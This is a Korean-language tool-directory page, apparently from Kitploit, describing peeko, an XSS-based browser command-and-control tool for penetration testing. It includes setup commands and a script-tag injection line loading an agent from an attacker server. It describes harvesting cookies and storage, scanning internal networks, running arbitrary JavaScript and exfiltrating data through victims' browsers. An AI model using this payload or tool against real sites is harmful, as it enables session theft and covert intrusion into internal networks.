Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/b3rito/peeko
ReconnaissanceNetwork MappingPort ScanningLateral MovementWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingCommand and Control
GitHubb3rito/peeko
2302811년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

peeko

peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.

저장소 보기

peeko

버전: v1.1

peeko는 XSS를 활용한 브라우저 기반 C2(Command and Control) 도구로, 피해자의 브라우저를 내부 네트워크의 은밀한 프록시로 사용합니다.

주입된 XSS 페이로드를 통해 peeko는 중앙 서버에 WebSocket 연결을 설정하여, 공격자가 피해자의 브라우저를 원격으로 제어해 내부 서비스에 요청을 보내고, 네트워크를 스캔하고, 데이터를 유출하거나 임의의 JavaScript를 실행할 수 있게 합니다 — 단일 바이너리를 드롭하지 않고도 가능합니다.


기능

  • 공격자와 피해자 간 WebSocket 기반 통신
  • 피해자 브라우저가 내부 URL을 가져오고 IP 범위 + 포트를 스캔
  • 간단한 제어판 제공:
    • 피해자 선택기
    • 수동 URL 가져오기
    • IP 및 포트 범위 스캐너
    • 사용자 지정 JS 실행(수동 또는 자동)
    • 파일 전달(자동/수동)
    • 브라우저 정보 및 토큰 수집(쿠키, 스토리지 등)
    • .txt 또는 .json으로 복사/저장 가능한 로그 뷰어
  • 자체 서명 인증서를 사용한 HTTPS 지원
  • 가벼움: 단일 Python 파일 + 정적 자산

요구 사항

  • Python 3.8+
  • OpenSSL
  • Linux/macOS(Debian 기반 시스템에서 테스트됨)

빠른 시작

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. 종속성을 설치합니다:

    root@kitploit:~
    make install
    
  3. (선택 사항) 스크립트를 실행 가능하게 만듭니다:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. 자체 서명 TLS 인증서를 생성합니다:

    root@kitploit:~
    make cert
    
  5. SERVER-IP 자리 표시자를 교체합니다:

    다음 파일을 열고 편집합니다:

    • static/agent.js
    • static/control.html

    SERVER-IP를 서버의 IP/도메인으로 교체합니다:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. 서버를 시작합니다:

    root@kitploit:~
    make run
    
  7. 브라우저에서 제어판을 엽니다:

    root@kitploit:~
    https://192.168.30.136:8443/static/control.html
    
  8. 에이전트를 주입합니다(예: XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    

제어판 기능

핵심 기능

  • 연결된 피해자 선택 및 관리
  • 피해자를 통해 내부/외부 HTTPS URL 가져오기
  • LAN 범위 스캔: 192.168.1.0/24, 10.0.0.10-20 등
  • 특정 포트 또는 범위 스캔(예: 80, 443,8000-8080)

파일 전달

  • 피해자에게 파일 전송(WebSocket을 통한 Base64)
  • 피해자 브라우저가 자동으로 파일을 다운로드
  • 연결 시 자동 업로드 지원

정보 수집

  • User Agent, 플랫폼, referrer, 쿠키, local/sessionStorage 수집
  • JSON으로 결과 보기
  • 수동으로 트리거하거나 연결 시 자동 수집

사용자 지정 JS 실행

  • 피해자 브라우저에서 임의의 JavaScript 실행
  • 전송 시 exec:... 형식 사용
  • 연결 시 자동 실행 지원
  • 예: exec:alert(document.cookie);

로깅

  • 모든 것이 기록됨(요청, 응답, 정보 덤프)
  • 로그를 .txt 또는 .json으로 복사하거나 내보내기
  • 터미널 로그처럼 디자인된 미니멀리스트 UI

CORS 및 혼합 콘텐츠 설명

최신 브라우저 정책은 peeko가 액세스할 수 있는 항목에 영향을 줍니다.

CORS 응답

헤더콘텐츠를 읽을 수 있나요?참고
Access-Control-Allow-Origin: *✅응답에 대한 전체 액세스
헤더 없음⚠️응답이 불투명(opaque)함
제한된 출처❌차단되거나 읽을 수 없음

혼합 콘텐츠

피해자는 HTTPS로 연결됩니다. 스캔 대상이 HTTP만 사용하는 경우:

  • 브라우저가 혼합 콘텐츠 요청을 차단
  • peeko는 http:// 엔드포인트에서 읽을 수 없음
  • 스캔 시 항상 HTTPS를 사용하는 대상 선호

실제로는

침투 테스트 중 Access-Control-Allow-Origin: *로 응답하고 HTTPS로 제공되는 내부 서비스를 발견하면, peeko는 파일을 드롭하거나 외부 연결을 열지 않고도 피해자의 브라우저에서 내부 데이터를 직접 유출할 수 있는 은밀한 프록시가 됩니다.


프로젝트 구조

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

워크플로우

  1. 공격자가 XSS를 주입합니다(저장형 또는 반사형 취약점을 통해)
  2. 피해자의 브라우저가 WebSocket을 통해 peeko 서버에 연결합니다
  3. 제어판을 통해 공격자는 다음을 수행할 수 있습니다:
    • 네트워크 스캔
    • URL 가져오기
    • 쿠키, 스토리지 덤프
    • 임의의 JS 실행
    • 응답 유출
    • 파일 드롭

사용 사례

  • XSS를 통한 내부 네트워크 매핑
  • 브라우저 기반 피보팅
  • 은밀한 파일 전달 / JS 드로퍼

면책 조항

이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다.
명시적 권한이 있는 환경 외부에서 peeko를 사용하는 것은 엄격히 금지됩니다.
모든 행동에 대한 책임은 사용자 본인에게 있습니다.


작성자

b3rito(mes3hacklab) 및 GioPpeTto 작성

도구 다운로드